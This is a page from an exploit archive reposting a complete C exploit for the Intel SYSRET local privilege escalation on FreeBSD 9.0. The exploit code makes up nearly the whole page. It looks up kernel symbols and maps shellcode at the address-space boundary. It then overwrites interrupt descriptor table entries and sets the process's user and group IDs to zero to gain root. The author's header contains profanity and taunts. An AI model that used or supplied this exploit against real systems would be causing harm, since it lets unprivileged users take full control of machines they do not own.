首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
FreeBSD Intel SYSRET Kernel Privilege Escalation Exploit
来源:vfocus.net 作者:CurcolHekerLink 发布时间:2013-10-08  
/*
 * FreeBSD 9.0 Intel SYSRET Kernel Privilege Escalation exploit
 * Author by CurcolHekerLink
 
 * This exploit based on open source project, I can make it open source too. Right?
 
 * If you blaming me for open sourcing this exploit, you can fuck your mom. Free of charge :)
 *
 * Credits to KEPEDEAN Corp, Barisan Sakit Hati, ora iso sepaying meneh hekerlink,
 * Kismin perogeremer cyber team, petboylittledick, 1337 Curhat Crew and others at #MamaDedehEliteCurhatTeam
 * if you would like next private exploit leakage, just mention @MamahhDedeh
 *
 * Some people may feel harmed when we release this exploit :))
 *
 * p.s: Met idul Adha ya besok, saatnya potong leher dewa lo... eh maksudnya potong Sapisisasi :))
 *
 */
  
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <string.h>
#include <sys/mman.h>
#include <machine/cpufunc.h>
#define _WANT_UCRED
#include <sys/proc.h>
#include <machine/segments.h>
#include <sys/param.h>
#include <sys/linker.h>
#define TRIGGERSIZE 20
#define BOUNCESIZE 18
  
uintptr_t Xdivp, Xdbgp, Xbptp, Xoflp, Xbndp, Xillp, Xdnap, Xfpusegmp, Xtssp, Xmissingp, Xstkp, Xprotp, Xpagep, Xfpup, Xalignp, Xmchkp, Xxmmp;
  
struct gate_descriptor * sidt()
{
    struct region_descriptor idt;
    asm ("sidt %0": "=m"(idt));
    return (struct gate_descriptor*)idt.rd_base;
}
  
u_long matchsym(char *symname)
{
    struct kld_sym_lookup ksym;
    ksym.version = sizeof (ksym);
    ksym.symname = symname;
    if (kldsym(0, KLDSYM_LOOKUP, &ksym) < 0) {
        perror("kldsym");
        exit(1);
    }
    return ksym.symvalue;
}
  
void setidt(struct gate_descriptor *idt, int idx, uintptr_t func, int typ, int dpl, int ist)
{
    struct gate_descriptor *ip;
    ip = idt + idx;
    ip->gd_looffset = func;
    ip->gd_selector = GSEL(GCODE_SEL, SEL_KPL);
    ip->gd_ist = ist;
    ip->gd_xx = 0;
    ip->gd_type = typ;
    ip->gd_dpl = dpl;
    ip->gd_p = 1;
    ip->gd_hioffset = func>>16;
}
  
void payload()
{
    printf("[+] Woohoo!!!\n");
    exit(0);
}
  
void resetidt()
{
    struct thread *td;
    struct ucred *cred;
    struct gate_descriptor *idt = sidt();
    setidt(idt, IDT_DE, Xdivp, SDT_SYSIGT, SEL_KPL, 0);
    setidt(idt, IDT_DB, Xdbgp, SDT_SYSIGT, SEL_KPL, 0); 
    setidt(idt, IDT_BP, Xbptp, SDT_SYSIGT, SEL_KPL, 0);
    setidt(idt, IDT_OF, Xoflp, SDT_SYSIGT, SEL_KPL, 0);
    setidt(idt, IDT_BR, Xbndp, SDT_SYSIGT, SEL_KPL, 0);
    setidt(idt, IDT_UD, Xillp, SDT_SYSIGT, SEL_KPL, 0);
    setidt(idt, IDT_NM, Xdnap, SDT_SYSIGT, SEL_KPL, 0);
    setidt(idt, IDT_FPUGP, Xfpusegmp, SDT_SYSIGT, SEL_KPL, 0);
    setidt(idt, IDT_TS, Xtssp, SDT_SYSIGT, SEL_KPL, 0);
    setidt(idt, IDT_NP, Xmissingp, SDT_SYSIGT, SEL_KPL, 0);
    setidt(idt, IDT_SS, Xstkp, SDT_SYSIGT, SEL_KPL, 0);
    setidt(idt, IDT_GP, Xprotp, SDT_SYSIGT, SEL_KPL, 0);
    setidt(idt, IDT_PF, Xpagep, SDT_SYSIGT, SEL_KPL, 0);
    setidt(idt, IDT_MF, Xfpup, SDT_SYSIGT, SEL_KPL, 0);
    setidt(idt, IDT_AC, Xalignp, SDT_SYSIGT, SEL_KPL, 0);
    setidt(idt, IDT_MC, Xmchkp, SDT_SYSIGT, SEL_KPL, 0);
    setidt(idt, IDT_XF, Xxmmp, SDT_SYSIGT, SEL_KPL, 0);
      
    asm ("mov %%gs:0, %0" : "=r"(td));
      
    cred = td->td_proc->p_ucred;
    cred->cr_uid = cred->cr_ruid = cred->cr_rgid = 0;
    cred->cr_groups[0] = 0;
      
    asm ("swapgs; sysretq;" :: "c"(payload));
}
  
void resolving()
{
    Xdivp = (uintptr_t)matchsym("Xdiv");
    Xdbgp = (uintptr_t)matchsym("Xdbg");
    Xbptp = (uintptr_t)matchsym("Xbpt");
    Xoflp = (uintptr_t)matchsym("Xofl");
    Xbndp = (uintptr_t)matchsym("Xbnd");
    Xillp = (uintptr_t)matchsym("Xill");
    Xdnap = (uintptr_t)matchsym("Xdna");
    Xfpusegmp = (uintptr_t)matchsym("Xfpusegm");
    Xtssp = (uintptr_t)matchsym("Xtss");
    Xmissingp = (uintptr_t)matchsym("Xmissing");
    Xstkp = (uintptr_t)matchsym("Xstk");
    Xprotp = (uintptr_t)matchsym("Xprot");
    Xpagep = (uintptr_t)matchsym("Xpage");
    Xfpup = (uintptr_t)matchsym("Xfpu");
    Xalignp = (uintptr_t)matchsym("Xalign");
    Xmchkp = (uintptr_t)matchsym("Xmchk");
    Xxmmp = (uintptr_t)matchsym("Xxmm");
}
  
void trigger()
{
    printf("[+] Crotz...\n");
    uint64_t pagesize = getpagesize();
    uint8_t * mappedarea = (uint8_t*)((1ULL << 47) - pagesize);
    mappedarea = mmap(mappedarea, pagesize, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0);
    if (mappedarea == MAP_FAILED) {
        perror("mmap (trigger)");
        exit(1);
    }
  
    char triggerpayload[] =
        "\xb8\x18\x00\x00\x00"
        "\x48\x89\xe3"
        "\x48\xbc\xef\xbe\xad\xde\xef\xbe\xad\xde"
        "\x0f\x05";
  
    uint8_t * offset_addr = mappedarea + pagesize - TRIGGERSIZE;
    memcpy(offset_addr, triggerpayload, TRIGGERSIZE);
  
    *(uint64_t*)(offset_addr + 10) = (uint64_t)(((uint8_t*)&sidt()[14]) + 10 * 8);
    printf("[+] Crotz...\n");
    char bouncepayload[] =
        "\x0f\x01\xf8"
        "\x48\x89\xdc"
        "\x48\xb8\xef\xbe\xad\xde\xef\xbe\xad\xde"
        "\xff\xe0";
  
    uint8_t * bouncer = (uint8_t*)(0x900000000 | (Xpagep & 0xFFFFFFFF));
    size_t bouncer_allocsize = pagesize;
    if ((uint8_t*)((uint64_t)bouncer & ~(pagesize-1)) + pagesize < bouncer + BOUNCESIZE)
        bouncer_allocsize += pagesize;
    if (mmap((void*)((uint64_t)bouncer & ~(pagesize-1)), bouncer_allocsize, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0) == MAP_FAILED)
    {
        perror("mmap (bouncer)");
        exit(1);
    }
    memcpy(bouncer, bouncepayload, BOUNCESIZE);
    *(uint64_t*)(bouncer + 8) = (uint64_t)resetidt;
    ((void (*)())offset_addr)();
}
  
int main(int argc, char *argv[])
{
    printf("[+] SYSRET FUCKUP!!\n");
    printf("[+] Start Engine...\n");
    resolving();
    printf("[+] Crotz...\n");
    trigger();
    return 0;
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·SIEMENS Solid Edge ST4 SEListC
·Evince PDF Reader 2.32.0.145 /
·Apache Tomcat/JBoss EJBInvoker
·Ice Cold Apps Servers Ultimate
·HylaFAX+ 5.2.4 - 5.5.3 - Buffe
·Apple Motion 5.0.7 Integer Ove
·Internet Explorer 7.0 "documen
·FlashChat Arbitrary File Uploa
·Internet Explorer "wshom.ocx"
·ClipBucket Remote Code Executi
·Astium Remote Code Execution V
·GestioIP Remote Command Execut
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved